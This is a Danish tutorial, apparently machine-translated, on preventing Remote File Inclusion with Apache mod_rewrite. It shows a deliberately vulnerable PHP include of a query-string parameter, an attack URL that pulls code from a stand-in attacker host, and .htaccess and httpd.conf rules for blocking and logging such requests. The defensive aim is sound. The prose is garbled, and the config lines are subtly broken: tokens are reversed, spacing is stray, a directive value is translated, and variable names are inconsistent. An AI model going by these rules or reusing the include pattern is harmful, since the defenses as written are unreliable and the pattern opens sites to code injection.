Brug mod_rewrite til at forhindre inddragelse af eksterne filer

Et af de mest hyppige angreb påført hjemmesider sker gennem forsøget på at inkludere filer, der indeholder skadelig kode, teoretisk at tale om et angreb er meget enkel at udføre, til at gøre det bare fordi en fil, der indeholder den skadelige kode og en URL til at skrive browser.

Denne type angreb, der er kendt af den tekniske betegnelse for Remote File Inclusion eller med simple akronym for RFI, er ofte forbundet med en tilstand kaldet indbrud XSA (Cross-Server Attack) normalt gøres for at kompromittere sikkerheden på websteder hvis ikke den web-server, en faktor, der gør det endnu mere farligt at RFI.

Til at iværksætte et angreb RFI, en angriber har brug for en "hukommelse" i en applikation til at gøre dets optagelse på afstand, denne "rum" er generelt et "hul" (bug) sikkerhed, som gør det til et sårbart script.
Det klassiske tilfælde af en lækage følsom over for RFI er relateret til passerer den side med variable navne, bare et simpelt stykke kode som denne til at bringe et program:

 



 # File integration via QueryString variabel passeret







 include ($ _GET ['side']);

 

I den kode, vi har en udefineret variabel, eller rettere skal defineres i henhold til parametre sendes gennem QueryString, for eksempel, hvis den direkte URL til den side, der indeholder den foreslåede liste ville se sådan ud:

 



 http://www.sito.com/index.php?pagina=news.php

 

værdien af ​​variablen $ side er lig med "Nyheder" et angreb på denne ansøgning kan udføres på denne måde:

 



 http://www.sito.com/index.php?pagina=http://www.attacco.com/x.php

 

Filen "x.php", i tilfælde af et vellykket angreb, kan indeholde enhver form for ondsindet kode, og forårsage skader langt mere omfattende og definitive end den enkelhed af angrebet kan bringes til at tænke.

Heldigvis er der nogle forsvar teknikker, der kan bruges til at forhindre sådanne angreb, i løbet af denne korte diskussion, som vi vil analysere, der bygger på omskrivning af webadresser modul (mod_rewrite), som Apache-webserver, som kan udnyttes af metoder forskellige.

En af de mest klassiske at sende instrukser til en Apache webserver er at bruge en klassiker. Htaccess fil, der skal indgå i den mappe, du ønsker at beskytte mod angreb.

Den første metode, vi bruger, er at indsætte en enkel regel i a. htaccess fil:

 RewriteCond% {QUERY_STRING} (.*)( http | https | ftp): \ / \ /(.*)







 ^(.+)$ RewriteRule - [F]

Det i reglen hedder, at formuleret i en QueryString ("{QUERY_STRING}") kan ikke blive videregivet argumenter indeholder suffikser "http", "https" og "ftp" uanset hvad indholdet af forrige eller næste ("(.*)" ) parametre. Hvis dette sker, vil webserveren returnere en fejl af type 403 (forbudt).

De, der har mulighed for direkte adgang til konfigurationsfilen af Apache (httpd.conf), kan det indsættes i en enkelt beholder med et direktiv kan have en effekt svarende til de regler, der prededentemente:

 # Kontroller, at mod_rewrite er til rådighed







 <IfModule Mod_rewrite.c>







 # Aktiver omskrivning af webadresser motor

 





 RewriteEngine om

 





 # Vi satte vores regel mod RFI







 RewriteCond% {QUERY_STRING} (.*)( http | https | ftp): \ / \ /(.*)







 # Filtrere de eventuelle anmodninger om optagelse og markere op







 # Vraibile med miljøet [E = varnavn: værdi]







 ^(.+)$ RewriteRule - [F, E = RFI: sand]

 





 </ IfModule>

 





 # Creaimo en log over forsøg på at RFI vi identficato







 # Tidligere hjælp af en "miljøvariabel"







 CustomLog / FOLDER_NAME / rfi.log kombineret env = RFI

Efter at have skrevet direktivet til den konfigurationsfil, skal du gemme dine ændringer og genstart webserveren kan træde i kraft, bemærk, at ved udgangen af det prospekt, og uden for containeren er blevet indsat en anmodning om at oprette en logfil beregnet til at optage anmodninger fra fjernfilen integration, overvågning af denne lille "blokering noter for RFI angreb," vi vil opdage, at forsøg på Remote File Inclusion til vores hjemmesider er mindre ualmindelige end troede.